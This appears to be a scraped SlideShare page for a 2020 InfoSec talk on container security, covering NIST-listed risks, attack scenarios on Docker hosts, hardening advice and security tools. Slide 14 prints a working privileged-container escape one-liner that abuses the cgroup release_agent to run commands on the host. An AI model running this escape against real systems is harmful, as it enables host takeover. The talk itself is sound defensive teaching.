![curl -X GET https://2130706433/info
{
“Name”:
“Jie”,
“Experience”: [
“IBM Security”,
“Qualcomm”,
“National Center of High-Performance Computing”],
“Certification”: [
“CCIE #50382”,
“OSCP”,
“CEH”]
} https://www.linkedin.com/in/jieliau
https://github.com/jieliau
https://www.facebook.com/jie.liau
https://twitter.com/0xJieLiau
https://medium.com/@liau.weijie](https://image.slidesharecdn.com/infosec2020-201102061906/85/Container-Security-2-320.jpg)
![Privileged Container is so Bad
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
https://twitter.com/_fel1x/status/1151487051986087936](https://image.slidesharecdn.com/infosec2020-201102061906/85/Container-Security-14-320.jpg)
Uploaded byJie Liau
Container Security
The document discusses container security issues and best practices highlighted at the Infosec 2020 event, emphasizing the rising prevalence of containerized applications by 2023. It identifies various risks associated with container usage, including image vulnerabilities and improper access rights, while suggesting measures such as using non-root users and avoiding privileged containers to enhance security. Several open-source tools for improving Docker security and the importance of container visibility are also mentioned.
More Related Content
![[오픈소스컨설팅]Docker기초 실습 교육 20181113_v3](https://cdn.slidesharecdn.com/ss_thumbnails/oscdockereducation20181113hanv3-181113075418-thumbnail.jpg?width=640&height=640&fit=bounds)
![5G Explained! A High Level Overview [Introduction]](https://cdn.slidesharecdn.com/ss_thumbnails/5gexplainedahighleveloverview-260119165306-cc137a3e-thumbnail.jpg?width=640&height=640&fit=bounds)
Container Security
- 1. Container Security Jie @InfoSec2020 Nov/02/2020
- 2. curl -X GEThttps://2130706433/info { “Name”: “Jie”, “Experience”: [ “IBM Security”, “Qualcomm”, “National Center of High-Performance Computing”], “Certification”: [ “CCIE #50382”, “OSCP”, “CEH”] } https://www.linkedin.com/in/jieliau https://github.com/jieliau https://www.facebook.com/jie.liau https://twitter.com/0xJieLiau https://medium.com/@liau.weijie
- 3. Gartner predicts thatby 2023, 70% of organizations will be running three or more containerized applications in production
- 4.
- 5. Infrastructure Hypervisor Guest OS GuestOS Guest OS Bin/Lib Bin/Lib Bin/Lib App1 App2 App2 Infrastructure Host OS Bin/Lib Bin/Lib Bin/Lib App1 App2 App3 Container Engineer Virtual Machine Virtual Machine Virtual Machine Containerized Application Containerized Application Containerized Application
- 6. Open Container Initiative- OCI • Runtime Spec • namespace • cgroups • Image Spec • Layer • Image index • Configuration
- 10.
- 11. Host OS Risk OrchestrationSystem Risks Image Risks Container Runtime RisksRegistry Risks •Improper user access rights •OS vulnerabilities •Unbounded admin access •Weak or unmanaged credentials •Unmanaged inter-container network traffic •Mixed of workload sensitivity levels •Insecure connections to registries •Stale images in registries •Image vulnerabilities •Image configuration •Embedded malware •Embedded secrets •Image trust •Vulnerabilities within the runtime software •Unbounded network access from containers •Insecure container runtime configurations •Shared kernel https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf
- 12. Container escape tothe host
- 13. Container should notrun as root Use non-root user in your Dockerfile
- 14. Privileged Container isso Bad d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o https://twitter.com/_fel1x/status/1151487051986087936
- 15.
- 16. Open Docker API Dockerhost Client Host Geek
- 17. Attack Scenario I VulnerableContainer 1. Attack vulnerable container 2. Compromise the host Docker Host or K8s Cluster
- 18. Attack Scenario II BadContainer 1. Push bad image 2. Deploy by admin 3. Create bad container Docker Host or K8s cluster
- 19. Attack Scenario III PrivilegedContainer 1. Find out open docker host 2. Create privileged container 3. Compromise the host Open Docker Host
- 20. Bad Image forCryptocurrency Mining https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
- 21. Kinsing Malware AttacksTargeting Container Env https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
- 23.
- 24. • Always usethe most up to date version of Docker • Allow only trusted users control of the Docker daemon by making sure only trusted users are members of Docker group • Run your containers as a non-root user (UID not 0) • Use only trusted base images when building your containers • Use minimal base images that don’t include unnecessary software packages that could lead to a larger attack surface • Don’t store secrets in images/Dockerfiles • When running containers, remove all capabilities not required for the container to function as needed • Don’t run containers with –privileged flag • Don’t mount sensitive host system directories on containers, especially in writable mode that could expose them to being changed maliciously in a way that could lead to host compromise • Don’t run sshd within containers • Don’t map any ports below 1024 within a container as they are considered privileged because they transmit sensitive data • Make sure you have rules in place that give you an audit trail for: • Docker daemon and Docker files and directories: • /var/lib/docker • /etc/docker • docker.service • docker.socket • /etc/default/docker • /etc/docker/daemon.json • /etc/sysconfig/docker • /usr/bin/containerd • /usr/sbin/runc https://www.stackrox.com/post/2019/09/docker-security-101/
- 25. CAP-ADD instead ofPrivileged • —cap-add • SYS_ADMIN • NET_ADMIN • MAC_ADMIN • NET_RAW • SYS_TIME • SYSLOG • … https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
- 26. Limit Resource Usage •—memory • —cpus • —cpu-period • —pids-limit • —kernel-memory • —device-read-bps • —device-read-ios • —device-write-bgp • —device-write-ios https://docs.docker.com/config/containers/resource_constraints/
- 27. Open Source Toolsfor Docker Security • Docker Bench for Security • Clair • Cilium • Anchore • OpenSCAP Workbench • Dagda • Notary • Grafaes • Sysdig Falco • Banyanops Collector https://techbeacon.com/security/10-top-open-source-tools-docker-security
- 29. Container Visibility isSo Damn Important https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/
- 30.
- 31.
- 32. • https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/ • https://www.docker.com/blog/containers-replacing-virtual-machines/ •https://blog.aquasec.com/cve-2016-9962-run-container-run • https://medium.com/@mccode/processes-in-containers-should-not-run-as- root-2feae3f0df3b • https://containerjournal.com/topics/container-security/why-running-a-privileged- container-is-not-a-good-idea/ • https://docs.docker.com/engine/api/ • https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate • https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/ malicious-docker-hub-container-images-cryptocurrency-mining • https://docs.docker.com/config/containers/resource_constraints/ • https://techbeacon.com/security/10-top-open-source-tools-docker-security
- 33.